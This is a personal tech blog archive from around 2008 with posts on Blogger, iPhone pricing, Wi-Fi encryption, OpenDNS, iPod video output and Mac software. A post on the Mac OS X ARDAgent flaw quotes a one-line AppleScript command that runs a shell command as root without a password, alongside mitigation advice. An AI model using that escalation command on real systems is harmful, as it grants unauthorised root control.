Blogger gets some real updates and Google moves away from Data Lock

There's still no update to the extremely antiquated BlogThis! blogger bookmarklet, but Google is, at long, long last, putting some energy into Blogger.

To see the new environment you need to be using FF 3 or Safari 3 (some versions of IE too) and running Blogger in draft. Today Safari 3 is showing the old editor, so things will be fluid.

The current big news is that Safari 3 is supposed to have full support -- which means it's a more viable browser for my use. The big future feature is promised FTP file upload and enclosures. Uploaded images are stored only in Picasa web albums.

I've run into these bugs and lost capabilities so far:

1. Items authored in the BlogThis! window are formatted incorrectly when edited in the new editor.
2. Items authored using ScribeFire for FF are formatted incorrectly in the new editor and cannot be fixed easily. (SF has just been updated, so this may change.)
3. Lists don't work fully. So if you save an item and try to add to a list, it inserts the row without a list tag. (known issue)
4. The Save Now button closes the draft, so you have to reopen it (known issue)
5. No formatting  buttons in HTML mode (they will return soon)

Some highlights on the editor:

1. The new post editor: Dynamic image resize, drag and drop location. Changes to the HTML editor that seem of unclear value to me (solving a non-existent problem?). Full Safari 3 support? (But today 3.1.2 gave me the old editor, so they may be tweaking something).
2. How to report HTML bugs with the new post editor: Add a comment to this blog post? Seems that won't scale.

There are also some very nice big new features, the backup and ability to effectively merge blogs seems awfully big to me (note that this particular page has links to pages that are "saved in draft" and thus don't appear as regular post pages -- a curious choice):

1. Star ratings. Readers only, personally I'd like to be able to rate my own posts too -- differentiate the ones I think are more interesting.
2. Import / export of blogs. Back up all of your posts and comments to one Atom XML file on your computer, and import your posts from one blog to another.
3. Embedded comment form. By incredibly popular demand, we’ve brought the comment form to your blog’s post pages, with support for Google Account and OpenID authentication.
   New post editor. We’ve completely revised the post editor, bringing in drag-and-drop image placement and better HTML handling.

Safari 3 support in the new editor is great, but for me the really big deal is import/export. Per blogger:

1. Merge two or more blogs into one. Take the exported posts and comments from one blog and import them into another one.
2. Move individual posts from blog to blog. After importing, select just a set of posts to publish and publish them with one click.
3. Back up your blog to your own storage. You can keep your words safe and under your control in case anything happens to your blog, or us, or if you want to remove them from the Internet.
4. Move your blog somewhere else. Our export format is standard Atom XML. We hope to see other blogging providers extend their Atom support to include import and export. And, if you decide to come back to Blogger, importing your export file will get you back up and running in seconds.

The last is big. Google claimed over a year ago that they were going to make user data portable (see also). I've been very skeptical, and it's taken them a heck of a long time to do anything real. Now I'm willing to give them some time to show genuine commitment -- such as the ability to move Picasa albums to other services.

Altogether this is the best Blogger news since it became a somewhat reliable service about a year ago. Maybe Google can do product commitment after all.

Now if Google would only fix BlogThis!

iPhone 2.0 is MUCH more expensive than iPhone 1.0 for current AT&T customers

I think Apple is still boasting of how affordable the new iPhone is.

This marketing swill is so evil.

For a current AT&T customer the cost has not fallen, it's gone UP a lot -- an additional $360 over two years. The increase is so large because the previous iPhone pricing was a great deal for a current AT&T customer. Current AT&T customers could buy an iPhone for the same cost as a new AT&T customer, and that's unheard of in the US mobile marketplace.

AT&T has now moved iPhone pricing in line with other "smartphone" pricing (which must make BlackBerry happier).

I've updated a prior post, here are some key excerpts ...

The Cost of the iPhone: More Per Month for Data - Bits - Technology - New York Times Blog

... According to a press release from AT&T, the carrier will no longer give a portion of monthly usage fees to Apple. Instead carriers will pay Apple a subsidy for each phone sold, in order to bring the price from $399 down to $199 for the 8 Gigabyte model. The company did not specify the amount of the subsidy. Subsidies of $200 to $300 are common in the industry.

What is more, consumers will now pay $30 a month for unlimited data service from AT&T, compared to $20 under the plan introduced last year. So even though the phone will now cost $200, consumers will be out more cash at the end of a two-year contract compared to the previous deal.

Tidbits: $160 more expensive ...

...SMS messages are no longer included in the data plan either, so you'll have to pay extra for them. Previously, the data plan included 200 SMS messages per month. AT&T's Messaging 200 plan, which includes 200 SMS messages, costs $5 per month, so it would seem likely that the iPhone 3G's SMS plan would be similar...

Ok, so for a new AT&T customer buying an iPhone the price has gone up by $160 over two years. Things are worse, however, for an AT&T customer

Current AT&T customers don't get the $200 discount on new phones. So for a current AT&T customer, the two year cost of a 16GB iPhone hasn't increased by $160, it's increased by $360.

A $360 increase over a two year ownership period is a substantial increase.

I spit in the general direction of Apple marketing.

The frailty of wireless encryption

WEP I knew was almost worthless. This is the most concise description of WPA limitations I’ve seen …

Coding Horror: Open Wireless and the Illusion of Security

… here are a few guidelines.

1. WEP = Worthless Encryption Protocol
   WEP, the original encryption protocol for wireless networks, is so fundamentally flawed and so deeply compromised it should arguably be removed from the firmware of every wireless router in the world. It's possible to crack WEP in under a minute on any vaguely modern laptop. If you choose WEP, you have effectively chosen to run an open wireless network. There's no difference.
2. WPA requires a very strong password
   The common "personal" (PSK) variant of WPA is quite vulnerable to brute force dictionary attacks. It only takes a trivial amount of wireless sniffing to obtain enough data to attack your WPA password offline -- which means an unlimited amount of computing power could potentially be marshaled against your password. While brute force attacks are still for dummies, most people are, statistically speaking, dummies. They rarely pick good passwords. If ever there was a time to take my advice on using long passphrases, this is it. Experts recommend you shoot for a 33 character passphrase.

In the end, perhaps wireless security is more of a deterrent than anything else, another element of defense in depth. It's important to consider the underlying message Bruce was sending: if you've enabled WEP, or WPA with anything less than a truly random passphrase of 33 characters, you don't have security.

You have the illusion of security.

The implication is that other versions of WPA (WPA-2?) are less vulnerable. In practice, as Schneier would probably say, it comes down to the value of what you’re trying to protect vs. the cost of the attack. Security is not a binary thing, it’s a spectrum. Relative, not absolute.

I suspect a good 20 character random password would suffice for most of us.

Update: A comment includes a nice link to a web site that helps create memorable passphrases.

Best review of the OS X ARDA root escalation vulnerability

I might follow the advice outlined here, though I may simply avoid installing software until Apple provides a fix. It is a bigger problem than I'd assumed when I first saw the Slashdot story:

TidBITS Safe Computing: How to Protect Yourself from the New Mac OS X Trojans

... Simply running the AppleScript command

osascript -e 'tell app "ARDAgent" to do shell script "reallybadstuff"'

runs "reallybadstuff" as root, without asking you for your password....

... the attacker exploits a vulnerability that gives them access to your user account, then he uses privilege escalation to take over your system as root, often installing additional malicious software. These combined attacks are common, although we don't see them often on Macs (in fact, I've never seen one on Mac OS X). The attacker will use something like a Web browser vulnerability to get his foot in the door, followed by the privilege escalation...

... The first major Trojan to leverage the ARDAgent vulnerability is called "PokerStealer" (identified by antivirus vendor Intego). Rather than using some sort of attack to get on your system, it pretends to be a poker game. When it's run, it uses the ARDAgent vulnerability to escalate its rights (without asking for your password) and installs malicious software like a keystroke capture program.

A more serious problem is that, as reported by Brian Krebs at the Washington Post, some bad guys developed a tool to bundle a package of malicious software into any downloadable Mac application. It uses the ARDAgent vulnerability to run these pieces without your interaction, like PokerStealer. The program needs to run only once, then it embeds itself in your system. Interestingly enough, Krebs reports that this tool was in development since May 2008. We can expect the bad guys to use all sorts of social engineering tricks (like writing little games) to get us to run their software on our systems.

To protect yourself, if you don't use (or plan on using) Apple Remote Desktop (which is different from Screen Sharing), you can go to /System/Library/CoreServices/RemoteManagement/ in the Finder, copy ARDAgent.app to your Desktop, right-click and compress it, and move the file someplace like your Documents folder. Then delete the original file. That way you just need to unzip and reinstall the file if you ever need ARDAgent down the road...

Following these preventive measures may mess up future Apple updates however.

The most important security measure for most OS X users is not to run as an admin user -- save the admin account for admin tasks. This security defect bypasses that protection.

Why Blackberry deserves to die

Tolkien wrote: "Many that live deserve death. Some that die deserve life."

So I'm not saying that the Blackberry will die, just that it doesn't deserve to live.

It's not just the inexcusable memory capacity limitations. It's not even the astounding lack of imagination in the software environment. No, the ultimate offense is this:

Passwords are masked on entry. Even on the Blackberry Pearl -- with its predictive text matching.

I realize very few products are as smart as OS X, which allows users to optionally unmask passwords. I could forgive Blackberry for omitting this feature if the Pearl had a conventional keyboard. It doesn't of course, and, speaking only for myself, text prediction does not work on my passwords.

The brief single character display (not available for numeric entry) is not enough.

This is one of the stupidest things I've come across. I've had plenty of time to investigate my wife's Pearl while traveling cross-country flat on my back, and my relatively positive initial impressions have dissolved. It really deserves to perish. If the iPhone 2.0 is half-decent I'll be selling a Pearl cheap as soon as ePocrates will run on the iPhone.

Open DNS saves my day

OpenDNS has some issues:

[Gruber] I linked to OpenDNS last week, praising their service after Comcast’s own DNS servers had failed me for the last time. It ends up though that OpenDNS is a polarizing service — they’re both praised and scorned. One of the reasons they’re
scorned is that they redirect requests to www.google.com to their own internal server before forwarding the request along to Google’s www.l.google.com. They also do wildcard matching for unregistered domain names, a move most DNS experts consider a no-no. They’re open about these “features” (e.g. here’s their explanation for the Google redirection), but I tend to take the side that any sort of “DNS+” service is worse than just plain DNS.

I think it’s worth keeping OpenDNS on deck for use in a pinch if your regular DNS server conks out, but I can’t recommend them for primary use.

On the other hand, OpenDS saved me today. The resort we're staying at has very marginal net access, and today I could reach Google and Microsoft but not much else. I figured their DNS was down. From a Google Cache page I retrieved the openDNS addresses:

OpenDNS > Get Started > Enable OpenDNS

Our nameservers are 208.67.222.222 and 208.67.220.220.

Bingo, that worked. Now everyone on the resort is switching.

I may start using OpenDNS - especially when traveling. The filtering options are appealing for our home use too, so I may well sign up and pay them. More on that after I review Gruber's comments in context.

iTunes for OS X is not a Mac application

There are many great features of iTunes. The query implementation, including the ability to nest queries, is superb.

Against this must be set the fact that iTunes is not a Mac application. If it were produced by anyone but Apple we'd all dump on it.

iTunes does not respect the Dock, for heavens sake! It ignores it when sizing windows. Even Firefox 3 respects the Dock (a very nice improvement over FF 2 in that regard, among many others).

Click the green plus icon on any Mac app and the primary window sizes to the "largest size consistent with good screen practices". Click it on iTunes/OS X and you get the mini-player.

That's just gross.

Firefox 3 is a vastly better OS X citizen than iTunes.

Isn't there anyone in Cupertino with a modicum of shame?

I get video output from my (old) video iPod. Finally.

Greed has a different meaning when applied to a corporation.

By human standards corporations are supposed to be greedy. "Greed is Good".

But there's still such a thing as a Corporate Greed. That's when a corporation takes bites that generate near term returns, but make customers bitter and lead to longer term losses.

Apple does that on occasion, most recently with the way they sell their current iPod video out connector. More on that in a moment, but first ...

I have an old fifth generation video iPod [1]. I've never done much with the video -- the few times I've tried to output to a TV I failed. We're heading out for a long road trip though, and I've loaded up the iPod with TV shows. Time to see if I can get video output working. A good Father's Day project.

The output will go to an incredibly cheap very low end 2 panel auto DVD player marketed using a recycled "Kawasaki" brand [2] with a min-jack AV.

It's probably been 3 years since I failed to get video out of the iPod. I'd forgotten ...

• you can get video output through the earphone jack as well as the dock connector
• there's a settings option hidden in the video menu that controls which connector gets the video stream. I use the "ask" option.

Both options require proprietary Apple video connectors [3]. Years ago, however, people discovered you could use a standard AV camcorder with the fifth generation (not current!) iPods if you swapped the output cables ...

O'Reilly Network -- Getting the Video out of Your New iPod--for Cheap! (Derrick Story, Nov 2005)

...In order to make your TV play back the iPod signal, you've got to redirect the outputs. You can't just plug the yellow RCA plug into the yellow RCA jack and the red into the red or the white into the white. No. Those geniuses at Apple send the video signal over the red RCA output. (Normally it arrives on yellow.) The sound comes through the white and yellow plugs.

I ended up going to an Apple store and testing this on iPod after iPod. They all have this quirk. It was intentional. But hey, it's proprietary. Woohoo. So here's what you have to do:

• Plug the red RCA plug into your TV's yellow RCA jack.
• Plug the yellow RCA plug into your TV's white RCA jack.
• Plug the white RCA plug into your TV's red RCA jack.

Except that never worked for me. Today I gave it another go, as the alternative was a trip to the Apple Store to buy the iPhone-compatible $50 DRMd, counterfeit-preventing, Apple-only dock connector video out cable set [4].

I tried 3 mini-jack to component cables, first against my TV's component inputs.

• white cable that came with my original iBook. It has the swapped cables Story describes, but it didn't work. I think it's a slightly different form of proprietary. It works with my camcorder if I swap its outputs!
• black camcorder cable: nope, just got hash
• another camcorder cable: worked perfectly.

The "Kawasaki" has a mini-AV input, so I used a short male-to-mini-AV adapter to plug in there, mating the connectors as per Story's description. Works very well, with a lovely image. If you turn it around, however, it doesn't work. Since it's a mini Av to mini-Av cable it should work in either "direction" but this hacked mini-mini cable is one directional.

My guess is that Apple's variation isn't just a cable swap, but differs slightly in connector layout as well. This may not be a simple attempt to make a steep margin on cables -- though Apple is certainly not above that. The analog output jack on the fifth generation iPod, like the analog output on the iBook, is serving two purposes. It has to work perfectly with standard audio output, but it also has to support a video channel. This is different from a camcorder output, which need not support a stereo audio cable.

So Apple's analog output from this device may be justifiably atypical. Even so, we know some AV cables work - albeit with swapped outputs. I've run into less defensible variations of this elsewhere, such as converters that claim to allow 3.5mm stereo headsets to work with "standard" 2.5mm phone earset (microphone) connectors.

If you're trying to get video from the 5G iPod headphone jack start with a good quality AV cable and test at the store if possible.

Of course if you have a modern iPod/iPhone/iTouch you're out of luck, you need to buy Apple's $50 connector kit.[4]

[1] You can figure out which iPod you have with this rather complex Apple support document.

[2] I can spend $2000 for Apple iMacs with heat problems and screens that last two years, and $200 for something from an anonymous Chinese factory that lasts forever and just works. Why?

[3] That's not the greedy part.

[4] Yep, that's the Corporate Class Greed. The kit includes a USB charger -- I have maybe six of those. If Apple had sold the cable for $25 without the charger I'd say they were greedy by human standards, but within corporate norms. I need to buy one of these when I get iPhone 2, I'll try to find a used one first or hope some counterfeiter has broken Apple's anti-counterfeiting scheme. Of course if Apple eliminated the charger and dropped the price to $25 I'd buy it from them.

Update 6/15/08

Apple is greedy with the way they package their proprietary AV output connector, but there is some justification for their proprietary approach.

For example:

• converters for connecting "standard" stereo mini-jack headphones to cell phone 2.5 mm outputs don't work.
• We're carrying a (cursed) Flip video camcorder too. It has a video/mono output jack. This won't work with the 3 component cable that works with the iPod. I have 4 different video/mono output cables that came with various cameras including the Flip. The first one I tested didn't work. The second did.
• As mentioned in my revised post above, supporting both stereo headphones and AV output probably requires some changes to the usual camcorder output.
  

In this world of seemingly standard audio-video 3.5mm and 2.5 mm mini-jack output my sense is the only reliable standard is the 3.5 mm stereo output connector. Everything else is more or less proprietary.

Burn: The best optical disk burn solution for OS X.

I love Burn.

I've tried tried other commercial alternatives, particularly trying to get rid of the invisible .DS_Store and other dot files OS X can put on CDs.

They flopped. I was back to using the built-in burning tool, but it doesn't let me readily enforce the lowest common denominator (PC Juliet) standard, and I'm not sure it fully excludes the treacherous dot files.

Today though, my OS X gave me the ridiculous 0x8002006D error message during a burn. That means something is wrong. Helpful.

I fired up Burn for the first time. Simple. Lets me set PC Joliet easily. Shows dot files so I can remove them. It also showed the error, but said my CD burner couldn't calibrate. That's really helpful, it suggests a hardware problem. I blew in some compressed air and used a different CD and it completed the burn.

Great app. Open source and free. If they provide something other than PayPal for donations I'll send money.

As for the burner -- well, this is a G5 iMac. Those machines should never have been made. Fantastic heat problems, especially with the buggy hardware control software Apple used for the first year or two of the G5 iMac life. I suspect the DVD is another victim of too much heat for too long -- this machine is heading for the scrap heap at age 2.7 years. Not happy.

I'll try more CD cleaning methods of course. The compressed air jet was a quickie.

Update 6/15/08: Rich T says Simply Burns is also very well done.

Another Google product bites the dust. That's good.

This is probably the third or fourth Google app I've used that's been quietly discontinued or effectively abandoned.

Google Browser Sync To Be Discontinued

...Google Browser Sync is a Firefox extension that synchronizes your bookmarks, web history, browser sessions and passwords across multiple computers by temporarily saving them to Google's servers. Unfortunately, this was the project of a small team at Google and it's no longer maintained...

I was think yesterday that Google Browser Sync was due to be abandoned. I'm getting psychic.

I'm glad they're at least officially shutting it down.

Google has been great at starting things, lousy at finishing them. They need to cut way back on new initiatives until they decide what they're going to be serious about, then fund maintenance properly. They also have to start recruiting people who like doing software fit, finish, and maintenance, and layoff hiring inventive types for a year or two.

For example -- either fix Google Calendar Outlook sync or abandon it.

I think all Google customers have a long list of apps that need attention (BlogThis!?). One cheer for a sign that Google knows they have a problem.

Cisco VPN Client for 10.5.3

Cisco VPN Client 4.9.01.0100 works for 10.4 and later, including 10.5.

It can be hard to find Cisco VPN client downloads, Andrew got this one for me.

Update: I couldn't get the image to download fully, and now it's offline. Comments tell us Cisco's distribution policy has not change, this was an unauthorized image and it's probably been removed.
I was able to download an image through my university account. It took 3 tries, I kept finding older versions on various U servers. The official site (UMN authentication required) had the version I needed: Cisco VPN Client 4.9.01.0100

I think for most people that's the best way to get an updated VPN Client -- find someone with access to an university account and ask them to get the client. Just be sure they know what the latest version is! I suspect many universities have multiple distribution sites.

Outlook 2003 treachery: revising recurrences wipes appointment data

I’m a hard core Outlook user.

I’m not proud of this. I wish Ecco Professional had survived, or even Agenda.

Still, it has some brilliant moments – especially when Outlook 2003 is combined with Windows Search (formerly Windows Desktop Search).

But.

Against good design, like the custom views (too bad the sort category view bug took ten years to fix!), must be set the the real nasties. Like one I just fully understood today.

If you change the pattern of a recurring appointment, you wipe all prior exceptions. That’s fine, but the “exceptions” are any appointment that has attachments, agenda items, category tags, etc.

Want to go back and look at a past agenda? Forget it.

Maybe you’ve attached attributes to appointments and keywords so the appointment record can serve as a lookup and index to printed notes?

Gone. Vaporized. All of it.

This is just plain evil.

Reduce SMS texting spam to cell phones

Cell phone spam costs recipients money – thanks to the insane charges carriers apply to text messages.

Pogues has some great tips - How to Block Cellphone Spam. The best at the moment is to change your SMS ID to an alias, spammers don’t bother to guess those and probably can’t process them with available software.

Clearly we’ll need better solutions though …

How to decide software is worth testing

I'm not that happy with Google's free web album plug-in for iPhoto, so I figured I'd try a commercial alternative.

If it passed a simple test.

The test?

It had to be easy to find the uninstall directions:

iPhoto to Picasa Web Albums F.A.Q. - Products | ubermind

How can I remove this plug-in from my system?
iPhoto to Picasa Web Albums can be removed by deleting the plug-in file located at:

~/Library/Application Support/iPhoto/Plugins/
iPhotoToPicasaWebAlbums.iPhotoExporter

(~ represents your home directory.)"

Not too hard, so I'll try it out.

This is a very good screening test for all OS X software ...

Update: 6/11/08

Testing concluded, software rejected because:

1. Licensing is by license server. So I can't backup my license, if their server goes down I can't recover it, etc. That's an immediately fatal flaw.
2. It's very, very, very slow to browse a large collection of albums. Something is broken, scrolling was awful.
3. It doesn't add much to Google's free uploader. In particular, there's no option to combine titles and comments to fit Picasa's single title field.
   

iPhoto '08: Grayscale images with color profiles appear black and inverted

I scanned old photos as 16 bit gray scale with Epson Scan on my V700.

The looked fine in Preview, but in iPhoto '08 (most recent) they had black previews and oddly inverted and faint views.

This has been a probelm since version 5.0.4: iPhoto 5.0.4 or later: Grayscale images appear inverted.

The scanner inserts a color profile, and they're not color images. iPhoto gets confused.

Preview doesn't.

One would think that over 3 versions Apple would have come up with better iPhoto behavior.

I removed the color profiles using the suggested AppleScript (see link) -- one at a time.

That worked. I'm sure there's a faster solution.

Very annoying, and it's only thanks to Google that it wasn't very aggravating.